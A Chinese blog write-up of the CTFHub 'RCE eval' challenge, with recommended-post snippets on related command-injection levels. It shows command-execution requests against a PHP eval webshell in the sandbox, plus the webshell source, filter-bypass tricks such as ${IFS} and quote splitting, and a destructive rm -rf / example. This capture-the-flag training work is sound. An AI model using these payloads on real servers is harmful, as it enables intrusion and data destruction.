CTFhub技能树--RCE之eval执行步骤详解

Strive_57

已于 2024-11-14 10:57:49 修改

阅读量240

点赞数 8

CC 4.0 BY-SA版权

分类专栏： CTFHub--RCE 文章标签：网络安全 php

于 2024-11-08 10:33:19 首次发布

本文链接：https://blog.youkuaiyun.com/wqatss/article/details/143614498

CTFHub--RCE 专栏收录该内容

2 篇文章

订阅专栏

1）查看代码：php代码中的意思是，如果请求中存在cmd，就执行eval木马

2）添加请求：我们在访问网页时，在网址中带上要求出现的变量cmd,使用system执行代码ls，查看当前目录是否存在flag，如果不存在再查看上级目录是否存在，步骤如下：

例如：

challenge-16fe78a1edbfc3bf.sandbox.ctfhub.com:10800/?cmd=system("ls") flag不存在

challenge-16fe78a1edbfc3bf.sandbox.ctfhub.com:10800/?cmd=system("ls /") flag_58792存在

challenge-16fe78a1edbfc3bf.sandbox.ctfhub.com:10800/?cmd=system("cat flag_58792") 找到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Strive_57

关注关注

8
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ctfhub技能树web：RCE里的eval执行和命令注入

2302_81010533的博客

03-30

668

远程命令/代码执行漏洞，简称为RCE漏洞，可以直接向服务器后台远程注入操作系统的命令或者代码，从而拿到服务器后台的权限。首先执行ping命令，ping本机ip:127.0.0.1,再加上ls这个系统命令，连起来就是127.0.0.1;ls接着查看里面的文件，构造命令127.0.0.1;检查网页显示内容可以发现题目中直接给出了一段源代码，代码的大致意思是判断用户是否传了一个 cmd 参数，否则执行 else。检查目录列表发现关于flag的文件，检查内容发现flag。，查看可以访问的文件，发现一个。

CTFHub-Web-RCE-命令注入

qq_54037445的博客

11-29

2712

1、常见的拼接符1、A;B 先执行A，再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。

参与评论您还未登录，请先登录后发表或查看评论

ctfhub--技能树rce

lulu001128的博客

02-28

975

解题思路

CTFHub 技能树rce

weixin_63231007的博客

05-18

1381

前言最近临近期末考试了，所以打算抽取时间来复习一下高数，线代，不然就要挂科了😭 后面难一些的地方后面再继续练习学习。但是学习也不能停搁，周六学校的战队也要进行纳新面试了，因此那就借CTFHub技能树，综合做一下刚开始学习时的一些基础漏洞，也算是回顾复习一下🐱‍👤 (1) eval执行 eval()函数 eval()函数中的eval是evaluate的简称，这个函数的作用就是把一段字符串当作PHP语句来执行 <?php if (isset($_REQUEST['cmd'...

CTFHub技能树rce

最新发布

star3119391396的博客

04-24

564

审计代码，发现过滤了flag关键字，include包含文件的内容，根据提示，发现有个shell.txt文件，而且文件内容是接受传参请求，可以利用这个漏洞。过滤三个关键字cat,flag,ctfhub，可以使用两个单引号或者两个双引号绕过。，可以使用%0a来作为回车符使用，效果一样。有个phpinfo()的网页，打开，搜索flag，没有。根据代码和提示，要使用php协议读取目录/flag。过滤了目录分隔符，但是可以使用命令拼接来找flag。过滤空格，可以使用${IFS}绕过。过滤了cat，但是可以用tac。

CTFHub 技能树 -RCE

qq_63963927的博客

10-16

313

可知，题目已经提供了一句话木马，所以我们的目标就是在index页面包含shell.txt，然后将ctfhub参数传入，以执行我们想要执行的命令，这里还需要注意，传入的命令中不能包含flag字符串，这里可以使用通配符来绕过。根据页面的源码，知道可以GET方式传入一个file参数，传入的file将会被inlcude包含，因此被包含文件中的命令也会被当做PHP指令执行。发现文件夹flag_is_here，接下来我们使用cd命令，进入到文件夹，ls查看这个文件的内容。所以可以使用php://input来执行命令。

CTFHub技能树 Web-RCE 详解

weixin_45808483的博客

11-13

2583

RCE简介：初学RCE（远程命令/代码执行漏洞）https://blog.youkuaiyun.com/qq_43814486/article/details/90020139 eval执行启动环境分析代码，提示我们将命令赋值给cmd执行我们先查看当前位置的文件，没有什么用 /?cmd=system("ls"); 我们查看根目录文件，发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..

CTFHub-Web-RCE-eval执行题目解析

weixin_46168073的博客

11-15

1562

一、启动场景点击web 点击RCE 点击eval执行。开启题目，启动场景。注册会送1000个币，做一个题目消耗30，做完奖励100还是50，总之完全不用担心币的问题。启动之后会出现一个链接，我们点击。二、解题过程这里会出现PHP代码。我们使用蚁剑。（安装之类的我会单独写一篇文章）右键--->添加数据。把URL复制到蚁剑，密码cmd 然后点击添加。可以看到我们添加数据成功。双击进...

CTFHub技能树web之RCE（一）

wzhwzh123321的博客

02-18

865

根据代码可以看到该网页使用request得到cmd参数并使用eval执行cmd的代码，其中isset函数用于检测是否传入了一个名为cmd的变量的值（是否非空），eval是将一串字符作为php代码执行,$_REQUEST默认包含了。使用hackbar传递POST请求，file为php://input使得POST参数可以作为原始请求的数据，使用bp抓包，即可看到执行POST参数中代码后的内容。substr函数是返回字符串的子串，意思是如果file的前六个字符为php://，那么就会包含file文件。

CTFhub RCE eval

luminous_you的博客

12-07

384

方法一：可以用蚁剑直接连接webshell cd / find -name flag*//查找当前目录以及子目录下以flag开头的文件方法二：【这里用post,用get也可以，毕竟是request记得加；】 cmd=system(“ls /”); cmd=system(“cd /;ls”); cmd=system(“cd /;cat flag_31360”); ...

CTFHub 技能树-- RCE（详解）

m0_62879498的博客

02-20

7629

CTFHub – RCE RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统 eval执行文件查看一开始的源代码： <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是：是否由变量cmd 如果有，就执行eval($_REQUEST['cmd

CTFHub-技能树-web-RCE

yuqie的博客

06-14

570

RCE(Remote Code/Command Execute)为远程代码/命令执行的漏洞。攻击者可以直接在web页面向后台服务器远程注入操作系统命令或者代码，从而控制后台系统，这就是RCE漏洞。

ctfhub技能树RCE部分(待完善)

qq_39670065的博客

11-09

835

eval执行 eval执行就是远程代码执行看看代码 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 连上蚁剑连上会发现这是一个Linux系统，要使用简单的Linux命令 ls 列出目录中的文件 cd 选择要进入的目录 cd / 返回到根目录 cat 查看文件更多命令见linux常用命令学习再次温馨提示：学习.

CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入-过滤cat

Static______的博客

07-17

394

过滤cat就是找个能代替的。

CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入-综合过滤练习

Static______的博客

08-19

782

根据题目提示以及代码。

CTFHub技能树笔记之RCE：过滤目录分隔符、过滤运算符、综合过滤练习

weixin_48799157的博客

03-29

3012

小白一个，记录解题过程，如有错误请指正！一、过滤目录分隔符 1.查看当前目录 2.有提示，进去看一下 127.0.0.1;ls flag_is_here 3.根据经验知道我们只要访问到php文件的内容就可以拿到flag了思路：这里我们可以用&&运算符将命令连接起来就能成功拿到flag 127.0.0.1;cd flag_is_here&&cat flag_19900138617064.php|base64 二、过...

【CTFHUB技能树】-命令注入RCE综合练习

zguohuai的博客

03-15

939

在CTFHUB攻防世界解决命令行综合注入

CTFHub RCE eval执行

2401_88422346的博客

11-05

297

系统命令执行：攻击者可以执行系统命令，比如 system('ls') 来列出服务器上的文件，或者更危险地， system('rm -rf /') 来删除文件。由图可知这段代码检查是否有一个名为 cmd 的请求参数被发送到脚本，如果有，它就会使用 eval() 函数执行这个参数的值。这是一个典型的远程代码执行（RCE）漏洞示例。攻击者可以利用这个漏洞执行系统命令、删除文件、窃取数据、甚至完全控制系统。在/文件夹中找到flag。复制网址并用蚁剑打开。

CTFHUB-RCE-eval执行

u014794539的博客

07-11

332

考点一句话木马 eval执行思路分析打开直接 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 那就直接连蚁剑了。。。。直接找到了得到flag ctfhub{587c0757ccda0ba89da63da0} ...

CTFHUB----web前置技能-rce

01-01

### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介远程命令执行（Remote Command Execution, RCE），是指攻击者能够通过应用程序接口发送特定指令，在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用，可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞当面对可能存在RCE漏洞的应用程序时，通常会寻找可以输入数据的地方，比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用，则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞为了确认是否真的存在这样的安全风险，可以通过尝试注入一些简单的测试语句来观察响应情况。例如，在支持PHP环境的情况下，可以试着向目标页面传递如下payload： ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息，则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去，那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表： ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素，如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议对于开发者而言，预防此类问题的发生至关重要。应当遵循最小权限原则分配资源访问权；对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程；定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。